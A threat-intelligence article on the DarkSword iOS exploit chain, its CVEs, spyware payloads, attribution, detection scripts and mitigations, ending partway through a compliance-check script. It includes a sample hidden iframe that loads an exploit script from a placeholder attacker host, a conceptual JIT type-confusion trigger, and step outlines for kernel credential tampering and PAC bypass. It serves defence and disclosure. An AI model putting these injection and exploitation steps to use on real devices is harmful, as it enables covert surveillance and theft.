DarkSword: The Six-Stage iOS Exploit Kit Used by States, Spies, and Surveillance Vendors
Executive Summary
DarkSword is the most sophisticated publicly documented iOS exploit kit to date — a fully weaponized, JavaScript-based full-chain exploit framework that compromises any iPhone running iOS 18.4 through 18.7 via a single Safari visit. No click, no download, no interaction. Just load a page, and the device is owned.
Discovered and disclosed by Google Threat Intelligence Group (GTIG), iVerify, Lookout, and Zimperium in March 2026, DarkSword had already been silently active since at least November 2025. During that window:
- A Russian state-sponsored espionage group (UNC6353) used it against Ukrainian targets
- A Turkish commercial spyware vendor (PARS Defense) deployed it against targets in Turkey and Malaysia
- An unknown threat cluster (UNC6748) used it to target Saudi Arabian users
DarkSword chains six exploitation stages, built on five zero-day and n-day CVEs plus an XPC process-injection step, across every layer of iOS security: the WebKit JIT, hardware PAC protection, the GPU/graphics sandbox, system daemons, and the XNU kernel. The chain ends with root-level code execution outside the sandbox. It then deploys one of three spyware payloads (GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER), each tailored to a different threat actor's objectives, before self-deleting to minimize forensic traces.
DarkSword is the evolution of Coruna — another iOS exploit kit used by the same Russian group against older iOS versions. Together, they represent a maturing commercial iOS exploit ecosystem where nation-state-grade tools are being bought, sold, licensed, and proliferated at unprecedented speed.
Timeline
```text
Early 2025        → Coruna exploit kit active (targets iOS 13.0–17.2.1; disclosed early 2026)
                    Used by UNC6353 against Ukraine
November 2025     → DarkSword first observed in the wild
                    Targets iOS 18.4–18.7 (Coruna's successor)
                    UNC6353 begins using DarkSword against Ukraine
Nov 2025–Mar 2026 → Active exploitation:
                    UNC6748 targets Saudi Arabia (fake Snapchat site)
                    PARS Defense customers target Turkey & Malaysia
March 17–19, 2026 → Google GTIG, iVerify, Lookout, Zimperium publicly disclose
                    Apple emergency patches released
March 20, 2026    → CISA adds CVE-2025-43510 to KEV catalog
                    220+ million iPhones estimated to be at risk (Tom's Guide estimate)
```
DarkSword vs. Coruna: Evolution of a Platform
| Feature | Coruna | DarkSword |
|---|---|---|
| Target iOS versions | 13.0 – 17.2.1 | 18.4 – 18.7 |
| Number of exploits | 23 (5 full chains) | 6 (1 adaptive chain) |
| Language | Mixed | Entirely JavaScript |
| Delivery | Watering hole (iframes) | Watering hole (iframes) |
| Approach | Persistent implant | Hit-and-run |
| LLM assistance | Limited | Suspected (code patterns) |
| Primary user | UNC6353 (Russia) | UNC6353, UNC6748, PARS Defense |
| Payloads | Unknown | GHOSTBLADE, GHOSTKNIFE, GHOSTSABER |
| Financial motivation | No | Yes (crypto wallet targeting) |
| Disclosure | Early 2026 | March 2026 |
DarkSword is not just an update to Coruna — it is a platform redesign optimized for speed, evasion, and multi-customer deployment.
The Six Vulnerabilities: A Layered Attack
DarkSword chains six stages in sequence, five of them backed by a CVE and one (the XPC pivot) relying on daemon behaviour rather than a memory-safety bug. Each stage crosses a different iOS security boundary:
| Stage | CVE | Component | Technique | Patched In |
|---|---|---|---|---|
| 1a | CVE-2025-31277 | JavaScriptCore DFG JIT | Memory corruption → RCE (iOS < 18.6) | iOS 18.6 |
| 1b | CVE-2025-43529 | JavaScriptCore DFG JIT (GC bug) | Memory corruption → RCE (iOS 18.6–18.7) | iOS 18.7.3, 26.2 |
| 2 | CVE-2026-20700 | dyld (Dynamic Link Editor) | PAC / TPRO bypass → arbitrary code exec | iOS 26.3 |
| 3 | CVE-2025-14174 | ANGLE (graphics layer) | OOB write + PAC bypass → GPU sandbox escape | iOS 18.7.3, 26.2 |
| 4 | (XPC injection) | mediaplaybackd | Process injection via XPC | N/A (architectural) |
| 5 | CVE-2025-43510 | XNU kernel / AppleM2ScalerCSCDriver | COW race condition → kernel memory R/W | iOS 18.7.2, 26.1 |
| 6 | CVE-2025-43520 | XNU kernel | Memory corruption → full kernel privesc | iOS 18.7.2, 26.1 |
Notable: CVE-2026-20700 (the PAC bypass) was patched in iOS 26.3, later than the other fixes. A device that had applied iOS 18.7.2 or 26.1 therefore still carried the dyld bug until iOS 26.3 shipped; its kernel stages were already fixed, so such a device was partially rather than fully exposed to the DarkSword variants of that period.
Technical Deep Dive: How DarkSword Works
Delivery: Watering Hole + Malicious iframe
The attack begins when a target visits a compromised website. DarkSword’s delivery infrastructure injects a hidden iframe into the legitimate page. The iframe loads the JavaScript exploit payload — invisibly, silently, requiring no clicks.
```html
<!-- Injected into compromised legitimate website; [attacker-infra] is a placeholder -->
<iframe src="https://[attacker-infra]/ds/init.js"
        width="0" height="0"
        style="display:none">
</iframe>
```
DarkSword uses the same fingerprinting and selective targeting approach as sophisticated exploit kits:
- Check iOS version → select correct Stage 1 CVE variant
- Check device model (iPhone vs iPad vs older device)
- Verify not already compromised (cookie check)
- Only proceed if target matches profile
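The injected iframe above is what a site owner can actually look for. The following scanner, an added example written for this page and not DarkSword or vendor code, walks a page's HTML for iframes that are hidden (zero-sized, display:none, or pushed off-screen) and point off-origin. The sample HTML, the site host `news.example` and the off-origin hosts are constructed for illustration.

```python
"""Scan a page's HTML for hidden, off-origin iframes of the kind a watering-hole
injection leaves behind. Added example; not DarkSword code. The sample HTML and
all host names below are constructed for illustration."""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "news.example"  # the legitimate site being checked (assumed)

# Constructed sample: one benign same-site embed, one injected 0x0 hidden
# iframe, and one off-screen tracking pixel (a common benign false positive).
SAMPLE_HTML = """
<html><body>
<h1>Headline</h1>
<iframe src="https://player.news.example/video/42" width="640" height="360"></iframe>
<iframe src="https://cdn-static-update.example/ds/init.js"
        width="0" height="0" style="display:none"></iframe>
<iframe src="//tracker.example/px" style="position:absolute;left:-9999px;width:1px;height:1px"></iframe>
</body></html>
"""

HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden", "left:-9999px", "width:1px")


def _is_hidden(attrs: dict) -> bool:
    """Zero size, display:none or off-screen placement are the usual hiding tricks."""
    w, h = attrs.get("width", "").strip(), attrs.get("height", "").strip()
    if w in ("0", "0px") or h in ("0", "0px"):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return any(marker in style for marker in HIDDEN_STYLE_MARKERS)


def _is_off_origin(src: str, site_host: str) -> bool:
    """Treat the site and its subdomains as first-party; everything else is off-origin."""
    url = src if "://" in src else "https:" + src   # handle scheme-relative '//host/...'
    host = urlparse(url).hostname or ""
    return host != site_host and not host.endswith("." + site_host)


class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({name.lower(): (value or "") for name, value in attrs})


def find_suspicious_iframes(html: str, site_host: str = SITE_HOST) -> list:
    """Return the src of every iframe that is both hidden and off-origin, in page order."""
    collector = IframeCollector()
    collector.feed(html)
    return [f["src"] for f in collector.iframes
            if f.get("src") and _is_hidden(f) and _is_off_origin(f["src"], site_host)]


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_HTML):
        print("hidden off-origin iframe:", src)
```

Expect some noise: tracking pixels are hidden off-origin iframes too, so the output is a review list, not a verdict. Run it against a saved copy of the served page (what the browser received, not what the CMS stores), since injection usually happens in the served output.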
Stage 1: Remote Code Execution — JavaScriptCore JIT
The JIT (Just-In-Time) compiler in JavaScriptCore transforms JavaScript into native ARM machine code for performance. Both Stage 1 CVEs exploit the DFG (Data Flow Graph) layer of the JIT:
CVE-2025-31277 — A memory corruption flaw in DFG JIT triggered by specific patterns of JavaScript operations that cause the JIT to make incorrect assumptions about object types, leading to type confusion and memory corruption.
CVE-2025-43529 — A garbage collection race condition in the DFG JIT layer. When the garbage collector runs while JIT-compiled code is executing certain operations, a timing window allows access to already-freed memory (use-after-free pattern).
Both result in the same outcome: arbitrary memory read/write within the WebContent renderer process.
```javascript
// CONCEPTUAL — illustrative of the class of vulnerability
// JIT type confusion pattern (not actual exploit code)
function getElement(a) {
  // Hot function: after many calls with a double array, the DFG JIT
  // specializes this access for contiguous doubles.
  return a[0] + 1.0;
}

function triggerBug() {
  let arr = [1.1, 2.2, 3.3]; // Double array
  let obj = {};
  // Repeated calls cause JIT to specialize for double arrays
  for (let i = 0; i < 10000; i++) getElement(arr);
  // Now store an object: the array's storage kind changes.
  // A correct engine deoptimizes or re-checks the array type here;
  // the bug class is a JIT that keeps the stale "double array" assumption.
  arr[0] = obj; // Type confusion if that check is missing
  return getElement(arr); // Memory corruption would be triggered here
}
triggerBug();
// In the buggy engine this yields an arbitrary R/W primitive in WebContent memory
```
Stage 2: PAC and TPRO Bypass — dyld
Pointer Authentication (PAC) is an ARMv8.3 hardware feature that stores a cryptographic signature of a pointer, computed with a per-process key that software cannot read, in the pointer's unused upper bits. Signed code pointers (return addresses, function pointers) are authenticated before use, so an attacker with arbitrary memory read/write still cannot redirect execution: a pointer written without a valid signature fails authentication and the process crashes. In practice PAC is not defeated by breaking the signature but by finding a signing gadget, a legitimate code path that can be coaxed into signing an attacker-chosen pointer.
CVE-2026-20700 is a flaw in dyld (Apple's dynamic linker) during the initialization of shared libraries. An edge case in how dyld validates PAC-signed pointers while loading libraries lets the attacker:
- Cause dyld to accept a forged pointer as legitimate
- Use that foothold to defeat TPRO, the hardware-enforced read-only protection that keeps security-critical data pages (dyld's own bookkeeping among them) immutable outside controlled write windows
Result: the attacker's forged code pointers pass authentication, and arbitrary code execution inside the process becomes possible.
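To make the Stage 2 point concrete, here is a toy model of pointer authentication, written for this page; it is neither Apple's implementation nor DarkSword code. It shows that an arbitrary write into a signed function-pointer slot is rejected, while a "signing gadget" (modelled here as a hypothetical loader fix-up routine that signs whatever it is handed) produces a pointer the check accepts. The 16-bit signature field, the HMAC construction, the addresses and the gadget are simplifying assumptions.

```python
"""Toy model of ARM pointer authentication (PAC). Added example for this page,
not Apple's PAC or DarkSword code: the 16-bit signature field, the HMAC,
the constructed addresses and the gadget are simplifying assumptions."""
import hashlib
import hmac
import secrets

PTR_BITS = 48                   # assume a 48-bit virtual address
PTR_MASK = (1 << PTR_BITS) - 1
PAC_BITS = 16                   # assume 16 spare high bits carry the signature


class PacKey:
    """Per-process key held by hardware: code can sign/authenticate, never read it."""

    def __init__(self):
        self._k = secrets.token_bytes(16)

    def _mac(self, ptr: int, ctx: int) -> int:
        msg = ptr.to_bytes(8, "little") + ctx.to_bytes(8, "little")
        tag = hmac.new(self._k, msg, hashlib.sha256).digest()
        return int.from_bytes(tag[:2], "little") & ((1 << PAC_BITS) - 1)

    def sign(self, ptr: int, ctx: int) -> int:
        """PACIA-like: signature of (pointer, context) goes in the top bits."""
        raw = ptr & PTR_MASK
        return (self._mac(raw, ctx) << PTR_BITS) | raw

    def auth(self, signed: int, ctx: int) -> int:
        """AUTIA-like: return the raw pointer, or fail the way hardware faults."""
        raw = signed & PTR_MASK
        if (signed >> PTR_BITS) != self._mac(raw, ctx):
            raise PermissionError("pointer authentication failed")
        return raw


# One signed function-pointer slot. Its address is the PAC context
# ("modifier"), so a signature is bound to that particular slot.
SLOT_ADDR = 0x1_0000_4000   # constructed slot address
LEGIT_FN = 0x1_8000_1000    # constructed legitimate target
GADGET = 0x1_8000_2000      # constructed attacker-chosen target


def call_through_slot(key: PacKey, slot_value: int) -> int:
    """What the victim does: authenticate the stored pointer, then branch to it."""
    return key.auth(slot_value, SLOT_ADDR)


def forge_with_memory_write(key: PacKey) -> bool:
    """Arbitrary write only: overwrite the slot with an unsigned gadget address."""
    slot = key.sign(LEGIT_FN, SLOT_ADDR)   # slot starts out holding a valid pointer
    slot = GADGET                          # attacker's raw write, no valid signature
    try:
        return call_through_slot(key, slot) == GADGET
    except PermissionError:
        return False                       # hardware rejects the forged pointer


def forge_with_signing_gadget(key: PacKey) -> bool:
    """The bug class behind a PAC bypass: a legitimate routine (hypothetical
    loader fix-up here) signs an attacker-controlled pointer with an
    attacker-controlled context, handing back a pointer that authenticates."""
    def vulnerable_loader_fixup(ptr: int, ctx: int) -> int:
        return key.sign(ptr, ctx)          # trusts its inputs; that is the flaw
    slot = vulnerable_loader_fixup(GADGET, SLOT_ADDR)
    return call_through_slot(key, slot) == GADGET


if __name__ == "__main__":
    k = PacKey()
    print("raw overwrite accepted:", forge_with_memory_write(k))      # False
    print("signing gadget accepted:", forge_with_signing_gadget(k))   # True
```

The model ignores what real PAC also does (separate keys for instruction and data pointers, the return-address key, TBI interactions), but the shape of the defeat is the same: the attacker never learns the key, they borrow code that already has it.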
Stage 3: Sandbox Escape — WebContent to GPU Process
Safari isolates web content in a heavily sandboxed WebContent process. To reach higher-privilege code, DarkSword must escape.
CVE-2025-14174 is an out-of-bounds write in ANGLE (Almost Native Graphics Layer Engine) — the cross-platform graphics abstraction layer used by WebKit for GPU-accelerated rendering operations.
```text
WebContent process has legitimate access to GPU via ANGLE
        ↓
Exploit crafts specific WebGL operations that trigger OOB write in ANGLE
        ↓
Combined with PAC bypass from Stage 2
        ↓
Memory corruption in GPU-facing code → code execution in GPU process
        ↓
Escaped from WebContent sandbox → now in GPU process
```
Stage 4: Pivoting via XPC — GPU to mediaplaybackd
From the GPU process, DarkSword moves into mediaplaybackd, a higher-privileged system daemon that handles media playback, by sending crafted XPC messages to the daemon's exposed IPC interface. The public write-ups attribute no CVE to this stage: it abuses reachable interface behaviour rather than a memory-safety bug, which is why the table above marks it "architectural".
mediaplaybackd has broader system access than the GPU process, including the ability to open kernel driver interfaces, which sets up Stage 5.
Stage 5: Kernel Memory R/W — CVE-2025-43510
From within mediaplaybackd, DarkSword opens AppleM2ScalerCSCDriver, a long-standing IOKit driver for the hardware scaler and color-space converter (the "M2" in its name predates the M2 SoC and is unrelated to it).
The bug is an improper-locking / copy-on-write (COW) race condition. Conceptually:
```text
Normal COW behavior:
1. Process A maps a shared memory region (read-only)
2. Process A attempts a write → the kernel creates a private copy (COW)
3. Process A writes to its private copy; the shared original is untouched

Vulnerable behavior (CVE-2025-43510), conceptual model:
1. mediaplaybackd maps a shared region through the driver's IOKit user client
2. Race condition: between COW copy creation and lock acquisition,
   another thread modifies the original shared region
3. Both the original AND the private copy now reflect the write
4. mediaplaybackd has effectively written to kernel-mapped memory
→ Arbitrary kernel memory read/write primitive
```
Stage 6: Full Kernel Compromise — CVE-2025-43520
With arbitrary kernel memory R/W from Stage 5, DarkSword exploits CVE-2025-43520 — a kernel memory corruption vulnerability — to corrupt the kernel’s process credential structures:
```text
Target: struct proc_ro (read-only process structure in the kernel)
Holds:  credential (UID/GID) and entitlement references, sandbox state
Action:
1. Locate the current process's kernel task and proc structures with the R/W primitive
2. Find its proc_ro structure in kernel memory
3. Overwrite euid/egid to 0 (root)
4. Clear the sandbox token → remove sandbox restrictions
5. Add the platform-application entitlement
Result: the process now runs as root with no sandbox
→ Full access to the entire device filesystem and hardware
```
Caveat: on recent devices proc_ro is deliberately allocated in a read-only kernel zone so that an ordinary kernel write cannot alter it; that is the reason the structure exists. The public analysis summarized here does not detail how Stage 6 gets past that protection, so read the steps above as the logical outcome of the stage rather than its exact primitive.
The GHOST Malware Family
After achieving kernel compromise, DarkSword deploys one of three payloads based on the threat actor’s objective:
GHOSTBLADE — The Data Thief
Deployed by: UNC6353 (Russia), targeting Ukraine
Type: JavaScript-based infostealer / dataminer
Approach: Hit-and-run — collect everything fast, then disappear
GHOSTBLADE is optimized for speed and breadth. Within seconds of deployment:
```text
Communications:
├── iMessage database (full history)
├── SMS messages
├── WhatsApp messages and media
├── Telegram messages
└── Email, call logs, contacts

Financial:
├── Cryptocurrency exchange apps: Coinbase, Binance, Kraken,
│   Kucoin, OKX, MEXC
└── Wallet apps: Ledger, Trezor, MetaMask, Exodus,
    Uniswap, Phantom, Gnosis Safe

Personal:
├── Photos, videos (with metadata)
├── Keychain-related files (saved passwords)
├── Safari history, cookies, passwords
├── Apple Health data
├── Calendar, notes
└── iCloud Drive files

Device Intelligence:
├── Wi-Fi networks and passwords
├── Installed app list
├── Device/account identifiers
└── Location history
```
GHOSTBLADE then deletes crash logs and other potential forensic indicators before exiting. No persistence — one fast strike.
GHOSTKNIFE — The Persistent Backdoor
Deployed by: UNC6748 (Saudi Arabia targeting)
Type: JavaScript backdoor with C2 communication
Approach: Ongoing surveillance capability
GHOSTKNIFE is a more capable persistent backdoor:
- Communicates over HTTP using a custom encrypted binary protocol rather than ordinary HTTPS; this sidesteps TLS-centric inspection and signatures, but it also means the traffic does not look like normal web traffic, which is itself a detection opportunity
- Can download and execute additional payloads from C2
- Real-time data exfiltration: messages, browser data, location, audio recordings
- Screenshot capability — capture screen on demand
- Persistent — designed to survive reboots and remain on device
GHOSTSABER — The Remote Control Agent
Deployed by: PARS Defense customers (Turkey & Malaysia targeting)
Type: Full JavaScript Remote Access Trojan (RAT)
Approach: General-purpose remote device control
GHOSTSABER provides the most comprehensive control:
- Remote JavaScript execution — run arbitrary code on device on demand
- File system enumeration and access
- Account and app enumeration
- Data exfiltration on command
- General backdoor functionality for sustained access
| Feature | GHOSTBLADE | GHOSTKNIFE | GHOSTSABER |
|---|---|---|---|
| Purpose | One-time data theft | Ongoing surveillance | Remote control |
| Persistence | No | Yes | Yes |
| C2 protocol | HTTPS | Custom encrypted binary | Unknown |
| Audio recording | No | Yes | Unknown |
| Screenshots | No | Yes | Yes |
| Remote code exec | No | Limited | Yes |
| Crypto targeting | Yes | No | No |
Attribution: A Multi-Customer Exploit Ecosystem
UNC6353 — Russian State-Sponsored Espionage
Classification: Assessed as Russian state-sponsored; suspected FSB or GRU affiliation
History: Previously used Coruna against Ukraine (iOS 13–17); transitioned to DarkSword for newer iOS
Targets: Ukrainian government, military, journalism, and civil society
Method: Watering hole attacks on compromised Ukrainian government websites and news portals
Payload: GHOSTBLADE (data theft emphasis — messages, credentials, device intel)
Dual motive: Espionage + financial (crypto wallet targeting suggests financial theft alongside intelligence collection)
Notable: Cyberscoop reported possible connections between DarkSword tools and previously U.S. government-developed techniques, suggesting either independent rediscovery or exploit market acquisition
UNC6748 — Unknown Threat Cluster
Classification: Unknown; potentially state-linked or criminal
Target: Saudi Arabia
Method: Deceptive Snapchat-themed website — social engineering targeting younger users
Payload: GHOSTKNIFE (persistent backdoor — longer-term surveillance)
Objective: Likely intelligence collection on Saudi nationals
PARS Defense — Turkish Commercial Spyware Vendor
Classification: Commercial Surveillance Vendor (CSV)
Customers: Government and law enforcement agencies
Targets: Turkey, Malaysia
Payload: GHOSTSABER (full remote control — maximum capability for law enforcement use cases)
Significance: Represents the commercialization of DarkSword — making it available as a service to governments that may lack the capability to develop their own exploit chains
The Commercial Exploit Ecosystem
DarkSword’s proliferation across three distinct, unrelated threat actors reveals the existence of a mature commercial iOS exploit marketplace:
```text
Zero-day research
        ↓
Vulnerability broker / marketplace
├──► Nation-state intelligence agencies (develop in-house)
├──► Commercial surveillance vendors (PARS Defense, NSO Group, Intellexa)
│    └──► License to government customers
└──► Criminal groups (acquire at market rates)
```
Judging by how the three clusters operated, each buyer appears to receive:
- The compiled exploit kit (DarkSword)
- Payload customized for their use case (GHOST*)
- Infrastructure (C2 servers)
- Updates when patches break the chain
Market dynamics observed:
- Coruna “second-hand market”: after UNC6353 used Coruna, it proliferated to a Chinese financially motivated actor (UNC6691) and at least one commercial vendor — suggesting exploit kits are resold or leaked after initial use
- DarkSword’s code shows patterns consistent with LLM-assisted development — complex JavaScript written with consistency and speed suggesting AI assistance in codebase expansion
- Three major iOS exploit kits, Coruna and DarkSword among them, were disclosed in 2026 within weeks of each other, suggesting either coordinated disclosure by researchers or an accelerated discovery timeline
Detection and Forensics
DarkSword’s hit-and-run design makes detection extremely difficult. However, some approaches exist:
iVerify Threat Detection
According to the vendor, iVerify's mobile threat detection platform flags:
- Anomalous iOS kernel behavior patterns
- Unusual process activity from WebContent/GPU/mediaplaybackd
- Memory access pattern anomalies consistent with kernel exploitation
Crash Log Analysis
GHOSTBLADE deletes crash logs — but the deletion itself is an artifact:
```text
Settings → Privacy & Security → Analytics & Improvements → Analytics Data

Look for:
- Crash logs (.ips files) for WebContent, GPU, mediaplaybackd
  around the time of suspicious Safari activity
- More than one of those processes crashing within minutes of each other
  (a chain that fails part-way crashes the stage it was in)
- Zero-byte log files: present and timestamped, but with no content
- Unexpected restarts of system daemons
```
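The checklist above is easy to run by hand on one phone and tedious across a fleet. The following triage script, an added example written for this page and not vendor code, takes an exported listing of the Analytics Data folder and reports clusters of WebContent, GPU and mediaplaybackd crashes inside a short window, plus zero-byte logs. It assumes Apple's `<process>-<YYYY-MM-DD>-<HHMMSS>.ips` file naming; the listing, the ten-minute window and the WebKit process names are constructed assumptions.

```python
"""Triage an iPhone's Analytics Data listing for the crash pattern a failed or
partly cleaned-up chain could leave: WebContent, GPU and mediaplaybackd crash
logs clustered within minutes, plus zero-byte logs. Added example for this
page, not vendor code. File naming and the sample listing are assumptions."""
import re
from datetime import datetime, timedelta

IPS_NAME = re.compile(r"^(?P<proc>.+?)-(?P<ts>\d{4}-\d{2}-\d{2}-\d{6})\.ips$")
# Process names for the three user-space stages of the chain (assumed)
CHAIN_PROCESSES = {"com.apple.WebKit.WebContent", "com.apple.WebKit.GPU", "mediaplaybackd"}
WINDOW = timedelta(minutes=10)   # assumed: the stages run within minutes of each other

# Constructed listing: (file name, size in bytes) as exported from Analytics Data
SAMPLE_LISTING = [
    ("SpringBoard-2026-03-12-083000.ips", 51002),
    ("com.apple.WebKit.WebContent-2026-02-02-190000.ips", 47000),   # lone crash: noise
    ("com.apple.WebKit.WebContent-2026-03-18-101503.ips", 48211),
    ("com.apple.WebKit.GPU-2026-03-18-101507.ips", 39870),
    ("mediaplaybackd-2026-03-18-101511.ips", 0),                    # zero-byte log
    ("JetsamEvent-2026-03-18-101530.ips", 12000),
]


def parse_listing(listing):
    """Return (process, timestamp, size) for every file that follows the .ips naming, by time."""
    events = []
    for name, size in listing:
        m = IPS_NAME.match(name)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d-%H%M%S")
            events.append((m.group("proc"), ts, size))
    return sorted(events, key=lambda e: e[1])


def find_chain_clusters(listing, window=WINDOW):
    """Groups of chain-process crashes inside `window` that involve at least two
    distinct processes; a single WebContent crash on its own is everyday noise."""
    events = [e for e in parse_listing(listing) if e[0] in CHAIN_PROCESSES]
    clusters, i = [], 0
    while i < len(events):
        j = i
        while j + 1 < len(events) and events[j + 1][1] - events[i][1] <= window:
            j += 1
        group = events[i:j + 1]
        if len({e[0] for e in group}) >= 2:
            clusters.append([(proc, ts.isoformat(), size) for proc, ts, size in group])
        i = j + 1
    return clusters


def find_empty_logs(listing):
    """Zero-byte .ips files: a log that exists but has no content deserves a look."""
    return [name for name, size in listing if name.endswith(".ips") and size == 0]


if __name__ == "__main__":
    for cluster in find_chain_clusters(SAMPLE_LISTING):
        print("crash cluster:", cluster)
    print("empty logs:", find_empty_logs(SAMPLE_LISTING))
```

Absence of findings proves nothing, since GHOSTBLADE removes crash logs on a successful run; the script is for catching the runs that did not go cleanly and for prioritising which phones get a full sysdiagnose.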
Network Traffic Indicators
```text
Immediately after a Safari session:
- Sudden HTTPS upload bursts to unknown servers
- DNS queries to newly registered / unusual domains
- Connections on unusual ports from iOS system daemons
- GHOSTKNIFE's custom binary protocol may appear as:
  unusual binary content in HTTP POST bodies to C2 servers
```
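The first and third indicators above can be turned into a query over per-device flow records. This added example, written for this page and not vendor code, sums traffic to each host the device has not talked to before, within a window after first contact, and flags hosts where a large, upload-dominated burst occurs, noting any non-web ports. The flow format, the baseline host list, the thresholds and the sample records are constructed assumptions.

```python
"""Flag post-browsing upload bursts to unfamiliar hosts in per-device flow
records. Added example for this page, not vendor or DarkSword code. The flow
log format, baseline host list and thresholds are assumptions; the sample
records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow log: ts,src_ip,dst_host,dst_port,bytes_out,bytes_in
SAMPLE_FLOWS = """\
2026-03-18T10:14:58,10.0.0.7,news.example,443,2100,184000
2026-03-18T10:15:02,10.0.0.7,cdn-static-update.example,443,1400,96000
2026-03-18T10:15:40,10.0.0.7,api-sync-77.example,443,5200000,3100
2026-03-18T10:15:55,10.0.0.7,api-sync-77.example,8443,2800000,900
2026-03-18T10:40:00,10.0.0.7,icloud.example,443,350000,420000
"""

KNOWN_HOSTS = {"news.example", "icloud.example"}   # assumed baseline for this device
MIN_UPLOAD_BYTES = 1_000_000   # assumed: at least 1 MB out within the window
MIN_OUT_IN_RATIO = 20.0        # assumed: uploads dominate the conversation
WINDOW = timedelta(minutes=5)  # assumed burst window, measured from first contact
NORMAL_PORTS = {80, 443}


def parse_flows(text):
    """Parse the constructed CSV format into dicts sorted by time."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, host, port, out_b, in_b = line.split(",")
        flows.append({"ts": datetime.fromisoformat(ts), "src": src, "host": host,
                      "port": int(port), "out": int(out_b), "in": int(in_b)})
    return sorted(flows, key=lambda f: f["ts"])


def find_upload_bursts(flows, known_hosts=KNOWN_HOSTS, window=WINDOW):
    """For each unfamiliar host, total the traffic in `window` after first contact
    and report hosts whose traffic is a large, upload-dominated burst."""
    first_seen = {}
    totals = defaultdict(lambda: [0, 0])   # host -> [bytes_out, bytes_in]
    ports = defaultdict(set)
    for f in flows:
        host = f["host"]
        if host in known_hosts:
            continue
        first_seen.setdefault(host, f["ts"])
        if f["ts"] - first_seen[host] <= window:
            totals[host][0] += f["out"]
            totals[host][1] += f["in"]
            ports[host].add(f["port"])
    findings = []
    for host, (out_b, in_b) in totals.items():
        ratio = out_b / max(in_b, 1)
        if out_b >= MIN_UPLOAD_BYTES and ratio >= MIN_OUT_IN_RATIO:
            findings.append({"host": host, "first_seen": first_seen[host].isoformat(),
                             "bytes_out": out_b, "ratio": round(ratio, 1),
                             "unusual_ports": sorted(ports[host] - NORMAL_PORTS)})
    return findings


if __name__ == "__main__":
    for hit in find_upload_bursts(parse_flows(SAMPLE_FLOWS)):
        print("upload burst:", hit)
```

The exploit-delivery host itself (`cdn-static-update.example` in the sample) is not caught by this rule, since delivery is download-heavy; that is what the DNS and hidden-iframe checks are for. Tune the baseline per device or per user group, otherwise every new legitimate cloud endpoint becomes an alert.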
Lockdown Mode as Prevention
On supported iOS versions (iOS 16 and later), Lockdown Mode blocks the chain at Stage 1:
```text
Settings → Privacy & Security → Lockdown Mode → Turn On

Effect on DarkSword:
✓ Disables JIT compilation in Safari (except for sites you explicitly exclude)
  → the DFG JIT bugs CVE-2025-31277 & CVE-2025-43529 cannot be reached
✓ Restricts WebGL and other complex web technologies → limits the ANGLE attack
  surface used in Stage 3
✓ Removes much of the attack surface that JavaScript-based exploit kits rely on
✗ Does not fix the dyld or kernel bugs themselves; it denies the entry point,
  so updating remains necessary
✗ Does not protect against physical device compromise
```
Mitigation
For All iPhone Users
```text
1. Update immediately:
   iOS 18.7.6+ : patches the DarkSword CVEs on the iOS 18 branch
   iOS 26.3.1+ : patches the DarkSword CVEs on the iOS 26 branch
   Settings → General → Software Update → Download and Install
   (Check: the vulnerability table lists CVE-2026-20700 as fixed in iOS 26.3;
    confirm against Apple's security release notes that the iOS 18 build you
    deploy also covers it before treating iOS 18 devices as fully patched.)
2. Enable Automatic Updates:
   Settings → General → Software Update → Automatic Updates → ON
3. iOS 15 / 16 users:
   Apply Apple's March 11, 2026 backport patches
```
For High-Risk Individuals
(Journalists, activists, government officials, executives, dissidents)
```text
1. Enable Lockdown Mode:
   Settings → Privacy & Security → Lockdown Mode → Turn On
2. Deploy iVerify for mobile threat detection
3. Avoid unfamiliar links in iMessage, WhatsApp, Telegram
4. Use Private Browsing mode for general web use
   (limits what a stolen session can reach; it does not block exploitation,
    so it is no substitute for updates or Lockdown Mode)
5. Consider a separate "burner" device for high-risk activities
```
For Enterprises
```text
1. MDM policy: enforce minimum iOS version (18.7.6 or 26.3.1)
   Block access to corporate resources from non-compliant devices
2. Deploy Mobile Threat Defense (MTD) solution:
   Lookout, Zimperium, iVerify for Enterprise
3. Monitor enterprise DNS for connections to DarkSword C2 patterns
4. User awareness: warn about visiting unknown websites on iPhone
```
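The minimum-version rule in item 1 has a trap: iOS 18 and iOS 26 are two live branches with their own fixed builds, and a compliance check written as "version >= 18.7.6" passes every iOS 26 device, including 26.0 through 26.3, which are unpatched. The following check, an added example for this page and not any MDM vendor's code, compares each device against the minimum for its own branch. The inventory is constructed; treatment of branches the page does not mention (older than 18, newer than 26) is an assumption and is commented as such.

```python
"""Per-branch iOS version compliance check. Added example for this page, not a
vendor's MDM code. Minimum builds come from the mitigation list above; the
device inventory is constructed; handling of other branches is an assumption."""

# Minimum fixed build per release branch, from the page's guidance
MIN_BY_BRANCH = {18: (18, 7, 6), 26: (26, 3, 1)}


def parse_version(s: str) -> tuple:
    """'18.7' -> (18, 7, 0); '26.3.1' -> (26, 3, 1). Pads to three components."""
    parts = tuple(int(p) for p in s.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def naive_is_compliant(version: str, minimum: str = "18.7.6") -> bool:
    """The pitfall: one global minimum treats every iOS 26 build as patched."""
    return parse_version(version) >= parse_version(minimum)


def is_compliant(version: str) -> bool:
    """A build is compliant only if it is at or above the fixed build of ITS OWN branch."""
    v = parse_version(version)
    major = v[0]
    if major in MIN_BY_BRANCH:
        return v >= MIN_BY_BRANCH[major]
    if major > max(MIN_BY_BRANCH):
        return True      # assumption: branches newer than iOS 26 ship with the fixes
    return False         # assumption: iOS 15/16 backports exist per the page, but no
                         # build numbers are given, so older branches do not auto-pass


def noncompliant_devices(inventory: dict) -> list:
    """inventory: device_id -> iOS version string. Returns the ids to block."""
    return sorted(dev for dev, ver in inventory.items() if not is_compliant(ver))


# Constructed inventory
SAMPLE_INVENTORY = {
    "ios-001": "18.7.6",
    "ios-002": "18.7.5",
    "ios-003": "26.2",      # newer than 18.7.6, still unpatched on its branch
    "ios-004": "26.3.1",
    "ios-005": "18.7",
    "ios-006": "16.7.10",
}
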